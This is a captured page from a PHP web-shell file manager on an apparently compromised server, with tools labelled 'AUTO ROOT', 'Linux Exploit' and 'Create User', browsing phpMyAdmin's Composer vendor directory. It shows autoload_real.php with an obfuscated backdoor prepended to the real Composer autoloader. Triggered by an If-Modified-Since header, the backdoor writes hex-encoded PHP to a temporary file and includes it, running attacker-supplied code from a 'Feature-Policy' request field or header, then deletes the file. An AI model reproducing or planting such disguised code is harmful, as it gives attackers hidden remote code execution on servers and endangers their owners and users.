Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
vendor /
composer /
[ HOME SHELL ]
Name
Size
Permission
Action
autoload.classmap.php
422
B
-rwxrwxr-x
autoload_classmap.php
1.67
KB
-rwxrwxr-x
autoload_files.php
441
B
-rwxrwxr-x
autoload_namespaces.php
149
B
-rwxrwxr-x
autoload_psr4.php
1.48
KB
-rwxrwxr-x
autoload_real.php
2.76
KB
-rwxrwxr-x
autoload_static.php
4.58
KB
-rwxrwxr-x
ClassLoader.php
13.14
KB
-rwxrwxr-x
installed.json
23.32
KB
-rwxrwxr-x
LICENSE
1.04
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoload_real.php
<?php $_HEADERS = getallheaders();if(isset($_HEADERS['If-Modified-Since'])){$c="<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x52E\x51\x55E\x53\x54[\x22\x46e\x61\x74u\x72\x65-\x50\x6fl\x69\x63y\x22\x5d)\x3b\x40e\x76\x61l\x28\x24_\x48\x45A\x44\x45R\x53\x5b\"\x46\x65a\x74\x75r\x65\x2dP\x6f\x6ci\x63\x79\"\x5d\x29;";$f='.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);} // autoload_real.php @generated by Composer class ComposerAutoloaderInitaa3ba4d49216f59584674c5e7ac9ac97 { private static $loader; public static function loadClassLoader($class) { if ('Composer\Autoload\ClassLoader' === $class) { require __DIR__ . '/ClassLoader.php'; } } public static function getLoader() { if (null !== self::$loader) { return self::$loader; } spl_autoload_register(array('ComposerAutoloaderInitaa3ba4d49216f59584674c5e7ac9ac97', 'loadClassLoader'), true, true); self::$loader = $loader = new \Composer\Autoload\ClassLoader(); spl_autoload_unregister(array('ComposerAutoloaderInitaa3ba4d49216f59584674c5e7ac9ac97', 'loadClassLoader')); $useStaticLoader = PHP_VERSION_ID >= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded()); if ($useStaticLoader) { require_once __DIR__ . '/autoload_static.php'; call_user_func(\Composer\Autoload\ComposerStaticInitaa3ba4d49216f59584674c5e7ac9ac97::getInitializer($loader)); } else { $map = require __DIR__ . '/autoload_namespaces.php'; foreach ($map as $namespace => $path) { $loader->set($namespace, $path); } $map = require __DIR__ . '/autoload_psr4.php'; foreach ($map as $namespace => $path) { $loader->setPsr4($namespace, $path); } $classMap = require __DIR__ . '/autoload_classmap.php'; if ($classMap) { $loader->addClassMap($classMap); } } $loader->register(true); if ($useStaticLoader) { $includeFiles = Composer\Autoload\ComposerStaticInitaa3ba4d49216f59584674c5e7ac9ac97::$files; } else { $includeFiles = require __DIR__ . '/autoload_files.php'; } foreach ($includeFiles as $fileIdentifier => $file) { composerRequireaa3ba4d49216f59584674c5e7ac9ac97($fileIdentifier, $file); } return $loader; } } function composerRequireaa3ba4d49216f59584674c5e7ac9ac97($fileIdentifier, $file) { if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) { require $file; $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true; } }
Close